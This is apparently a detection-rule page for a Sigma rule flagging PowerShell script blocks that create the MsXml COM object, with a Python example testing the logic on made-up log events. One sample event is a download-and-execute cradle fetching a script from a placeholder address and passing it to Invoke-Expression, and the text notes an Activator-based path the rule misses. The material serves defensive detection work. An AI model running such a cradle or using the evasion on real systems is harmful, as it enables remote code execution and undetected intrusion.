Powershell MsXml COM Object

Sigma Rules

Summary
This detection rule identifies PowerShell code that instantiates the MsXml COM object, which is commonly used to issue HTTP requests and to download and execute remote scripts. PowerShell is frequently abused by adversaries for unauthorized actions such as system discovery and code execution. The rule triggers when a logged script block contains `New-Object` with the `-ComObject` parameter together with the string `MsXml2` or `XmlHttp` (the ProgID of the object is typically written `MsXml2.XMLHTTP`). Organizations should monitor such activity because it may indicate malicious behavior, for example a staged download whose response body is passed to `Invoke-Expression`. To use this rule, Script Block Logging must be enabled on the monitored Windows systems (Group Policy: Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging); the rule consumes Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log. Legitimate administrative scripts that use the same COM object for web requests can cause false positives, so alerts should be triaged against the requested URL, the calling user and the parent process rather than dismissed or escalated on the match alone. The rule covers the 'Execution' tactic of the MITRE ATT&CK framework, specifically T1059.001 (Command and Scripting Interpreter: PowerShell).
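The matching logic described above, run over a handful of constructed Script Block Logging records, as an added example that is not part of the Sigma rule or of this page. The event class, its field names, the user names and the TEST-NET address are assumptions made for illustration; the records are not real telemetry. Besides two true positives (one in mixed case, since Sigma string matching is case-insensitive), the samples include a benign Excel COM instantiation, the same COM object created through `[Activator]::CreateInstance` without `New-Object` (which falls outside the rule's scope), and a Module Logging (4103) record that the rule's script-block logsource does not cover.

```python
# Added example, not part of the Sigma rule or the page it comes from:
# the rule's matching logic as described above, run over constructed
# Script Block Logging records (Event ID 4104 in the
# Microsoft-Windows-PowerShell/Operational log). All events below are
# made up for illustration; the field names are simplified, not the
# exact XML schema of the Windows event.
from dataclasses import dataclass
from typing import Iterable, List

# Strings the rule looks for. Sigma string matching is case-insensitive,
# so every comparison below goes through casefold().
NEW_OBJECT = "New-Object"
COM_OBJECT = "-ComObject"
PROGID_FRAGMENTS = ("MsXml2", "XmlHttp")  # either fragment is enough, per the summary


@dataclass(frozen=True)
class ScriptBlockEvent:
    event_id: int           # 4104 = PowerShell script block logged
    script_block_text: str  # the (possibly partial) script block body
    user: str               # who ran it, kept for triage only


def matches_msxml_rule(event: ScriptBlockEvent) -> bool:
    """Return True when the event satisfies the rule as summarised on the page:
    a 4104 script block that contains New-Object, -ComObject and at least one
    of the MsXml ProgID fragments."""
    if event.event_id != 4104:  # the rule's logsource is script block logging only
        return False
    text = event.script_block_text.casefold()
    if NEW_OBJECT.casefold() not in text or COM_OBJECT.casefold() not in text:
        return False
    return any(frag.casefold() in text for frag in PROGID_FRAGMENTS)


def run_detection(events: Iterable[ScriptBlockEvent]) -> List[ScriptBlockEvent]:
    """Filter a stream of events down to those the rule would alert on."""
    return [e for e in events if matches_msxml_rule(e)]


# Constructed sample events (hypothetical users, TEST-NET-1 address range).
SAMPLE_EVENTS = [
    # 1. The downloader pattern the rule is written for: fetch a remote
    #    script over HTTP and hand the response body to Invoke-Expression.
    ScriptBlockEvent(4104,
        "$h = New-Object -ComObject MsXml2.XmlHttp; "
        "$h.Open('GET', 'http://192.0.2.10/stage2.ps1', $false); "
        "$h.Send(); IEX $h.responseText",
        "CORP\\jdoe"),
    # 2. Same object, lower-cased by the operator: still matches because
    #    Sigma comparisons are case-insensitive.
    ScriptBlockEvent(4104,
        "$c = new-object -comobject msxml2.xmlhttp",
        "CORP\\jdoe"),
    # 3. Benign COM automation (Excel): New-Object -ComObject is present
    #    but no MsXml ProgID, so no alert.
    ScriptBlockEvent(4104,
        "$xl = New-Object -ComObject Excel.Application; $xl.Visible = $false",
        "CORP\\finance-svc"),
    # 4. Same COM object obtained without New-Object, via the .NET Activator.
    #    Outside the rule's scope, so it does not match; worth knowing when
    #    assessing coverage.
    ScriptBlockEvent(4104,
        "$t = [Type]::GetTypeFromProgID('MsXml2.XmlHttp'); "
        "$h = [Activator]::CreateInstance($t)",
        "CORP\\jdoe"),
    # 5. Identical text but from a Module Logging event (4103): the rule's
    #    logsource is script block logging, so this record is not considered.
    ScriptBlockEvent(4103,
        "$h = New-Object -ComObject MsXml2.XmlHttp",
        "CORP\\jdoe"),
]


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(f"ALERT user={hit.user} text={hit.script_block_text!r}")
```

Running the script reports two alerts (samples 1 and 2). Sample 4 shows why a script-block rule keyed on `New-Object -ComObject` should be paired with other coverage if the Activator path matters in your environment, and sample 5 shows why the Script Block Logging prerequisite stated above is not optional.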
Categories
  • Windows
  • Endpoint
Data Sources
  • Script
  • Process
ATT&CK Techniques
  • T1059.001
Created: 2022-01-19